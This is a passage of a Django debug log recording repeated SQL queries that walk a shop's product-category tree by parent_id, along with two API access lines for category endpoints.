"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:09:56,232 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:09:56,237 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:09:56,241 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:09:56,247 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:09:56,251 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:09:56,255 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:09:56,260 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:09:56,264 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:09:56,271 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:09:56,275 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:09:56,279 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:09:56,284 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:09:56,288 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:09:56,292 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:09:56,299 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:09:56,303 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 10:09:56,307 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:09:56,311 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:09:56,315 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:09:56,321 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:09:56,325 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:09:56,329 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:09:56,333 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:09:56,338 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:09:56,344 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:09:56,350 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:09:56,354 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:09:56,358 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:09:56,362 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:09:56,366 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:09:56,371 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:09:56,375 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:09:56,380 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:09:56,385 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:09:56,389 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:09:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 10:11:50,914 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:11:50,923 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:11:50,927 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:11:50,930 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:11:50,935 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 10:11:50,938 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:11:50,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:11:50,944 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:11:50,947 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:11:50,950 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:11:50,954 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:11:50,957 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:11:50,960 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:11:50,963 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:11:50,967 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:11:50,970 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:11:50,973 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:11:50,976 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:11:50,979 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:11:50,984 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:11:50,987 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:11:50,993 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:11:50,996 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:11:50,999 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:11:51,002 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 10:11:51,005 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:11:51,009 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:11:51,011 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:11:51,017 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) [20/Dec/2019 10:11:51] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 10:11:51,021 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:11:51,025 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:11:51,029 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 